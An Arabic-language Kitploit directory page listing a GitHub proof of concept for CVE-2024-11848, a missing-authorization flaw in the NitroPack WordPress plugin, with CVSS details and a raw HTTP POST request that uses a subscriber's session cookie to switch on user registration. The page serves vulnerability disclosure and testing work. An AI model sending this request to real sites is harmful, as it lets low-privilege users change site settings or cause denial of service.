Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-11848
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقسوء التكوين
GitHubrandomrobbiebf/cve-2024-11848

CVE-2024-11848

NitroPack <= 1.17.0 - فقدان التفويض لتحديث محدود للخيارات للمستخدمين المصادق عليهم (مشترك+)

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-11848

NitroPack <= 1.17.0 - غياب التفويض لتحديث محدود للخيارات للمستخدمين المصادق عليهم (مشترك+)

الوصف

إن إضافة NitroPack لووردبريس معرضة لتعديل غير مصرح به للبيانات بسبب عدم وجود فحص للصلاحية على إجراء AJAX 'nitropack_dismiss_notice_forever' في جميع الإصدارات وصولاً إلى 1.17.0 وشاملاً له. وهذا يتيح للمهاجمين المصادق عليهم، بصلاحية مستوى المشترك أو أعلى، تحديث خيارات عشوائية إلى قيمة ثابتة '1'، مما قد يؤدي إلى تفعيل خيارات معينة (مثل تمكين تسجيل المستخدمين) أو تعديل خيارات معينة بطريقة تؤدي إلى حالة حرمان من الخدمة.

التفاصيل

  • النوع: إضافة
  • Slug: nitropack
  • الإصدار المتأثر: 1.17.0
  • درجة CVSS: 8.1
  • تصنيف CVSS: مرتفع
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
  • CVE: CVE-2024-11848
  • الحالة: نشط

POC

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=subscriber%7C1737110766%7CYhdLxJv5qLyqmSVznKzPOC94NyU9PAMWPeef9cCtINN%7C8c6d11f15397dfb790e700f695c7480bb8267c86130c402afce6080076ccff2d
Content-Length: 88

action=nitropack_dismiss_notice_forever&security=92f60ea3ea&notice_id=users_can_register
تنزيل الأداة